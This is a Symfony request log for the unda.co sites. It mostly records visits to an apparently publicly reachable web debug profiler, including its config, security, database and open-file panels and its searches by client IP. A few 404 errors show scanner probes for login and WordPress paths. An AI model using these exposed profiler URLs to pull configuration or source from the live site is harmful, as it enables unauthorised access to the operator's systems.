[2025-12-18 21:50:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 21:52:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=config","method":"GET"} []
[2025-12-18 21:52:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 22:00:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=security","method":"GET"} []
[2025-12-18 22:00:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 22:01:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"272ff9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/272ff9","method":"GET"} []
[2025-12-18 22:01:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 22:06:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
[2025-12-18 22:06:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 22:09:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=twig","method":"GET"} []
[2025-12-18 22:09:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 22:09:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654?panel=cache","method":"GET"} []
[2025-12-18 22:09:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 22:12:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sonicui/7/login/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sonicui/7/login/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 22:18:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"759409","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/759409?panel=config","method":"GET"} []
[2025-12-18 22:18:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 22:26:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=twig","method":"GET"} []
[2025-12-18 22:26:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 22:29:14] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"7d4aba","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/7d4aba/search/results?ip=20.65.194.61&limit=10","method":"GET"} []
[2025-12-18 22:29:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=20.65.194.61&limit=10","method":"GET"} []
[2025-12-18 22:30:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 22:30:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f89e9a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f89e9a/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-18 22:30:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-18 22:34:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"210654","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/210654","method":"GET"} []
[2025-12-18 22:34:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 22:38:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 22:39:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"689482","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/689482?panel=exception","method":"GET"} []
[2025-12-18 22:39:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 22:41:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=db","method":"GET"} []
[2025-12-18 22:41:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 22:42:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=time","method":"GET"} []
[2025-12-18 22:42:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 22:42:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
[2025-12-18 22:42:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 22:43:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemaps.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemaps.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 22:44:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"9e546f","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/9e546f/search/results?ip=66.249.66.39&limit=10","method":"GET"} []
[2025-12-18 22:44:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.66.39&limit=10","method":"GET"} []
[2025-12-18 22:50:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c","method":"GET"} []
[2025-12-18 22:50:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 22:52:58] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 22:53:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-18 22:56:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"599fee","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/599fee?panel=request","method":"GET"} []
[2025-12-18 22:56:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 22:57:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=time","method":"GET"} []
[2025-12-18 22:57:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 22:59:15] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"503210","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/503210/search/results?ip=20.65.194.61&limit=10","method":"GET"} []
[2025-12-18 22:59:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=20.65.194.61&limit=10","method":"GET"} []
[2025-12-18 22:59:16] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"913d66","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/913d66/search/results?ip=20.65.194.61&limit=10","method":"GET"} []
[2025-12-18 22:59:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=20.65.194.61&limit=10","method":"GET"} []
[2025-12-18 23:04:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=twig","method":"GET"} []
[2025-12-18 23:04:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 23:08:45] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=src%2FHona%2FApiBundle%2FController%2FAddressController.php&line=250","method":"GET"} []
[2025-12-18 23:15:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=time","method":"GET"} []
[2025-12-18 23:15:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 23:15:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
[2025-12-18 23:15:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 23:15:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1786c3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1786c3","method":"GET"} []
[2025-12-18 23:15:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 23:18:06] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"97fff3","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/97fff3/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-18 23:18:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
[2025-12-18 23:23:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=security","method":"GET"} []
[2025-12-18 23:23:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 23:24:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a276d6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a276d6?panel=config","method":"GET"} []
[2025-12-18 23:24:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 23:30:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=swiftmailer","method":"GET"} []
[2025-12-18 23:30:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-18 23:30:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=time","method":"GET"} []
[2025-12-18 23:30:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 23:31:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=request","method":"GET"} []
[2025-12-18 23:31:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 23:36:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=config","method":"GET"} []
[2025-12-18 23:36:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 23:40:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=config","method":"GET"} []
[2025-12-18 23:40:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 23:41:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=twig","method":"GET"} []
[2025-12-18 23:41:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 23:42:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=dump","method":"GET"} []
[2025-12-18 23:42:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 23:47:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 23:48:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=cache","method":"GET"} []
[2025-12-18 23:48:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 23:51:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=cache","method":"GET"} []
[2025-12-18 23:51:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 23:54:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 23:55:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=router","method":"GET"} []
[2025-12-18 23:55:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 23:55:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
[2025-12-18 23:55:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 23:56:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7","method":"GET"} []
[2025-12-18 23:56:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 23:56:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=validator","method":"GET"} []
[2025-12-18 23:56:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-18 23:58:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=router","method":"GET"} []
[2025-12-18 23:58:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 23:58:15] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"342871","_route":"_profiler_router"},"request_uri":"https://unda.co/_profiler/342871/router","method":"GET"} []
[2025-12-19 00:02:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"567cce","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/567cce?panel=security","method":"GET"} []
[2025-12-19 00:02:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 00:02:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=time","method":"GET"} []
[2025-12-19 00:02:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 00:04:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=src%2FHona%2FWebBundle%2FController%2FDefaultController.php&line=14","method":"GET"} []
[2025-12-19 00:05:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 00:07:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=config","method":"GET"} []
[2025-12-19 00:07:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 00:09:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=db","method":"GET"} []
[2025-12-19 00:09:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
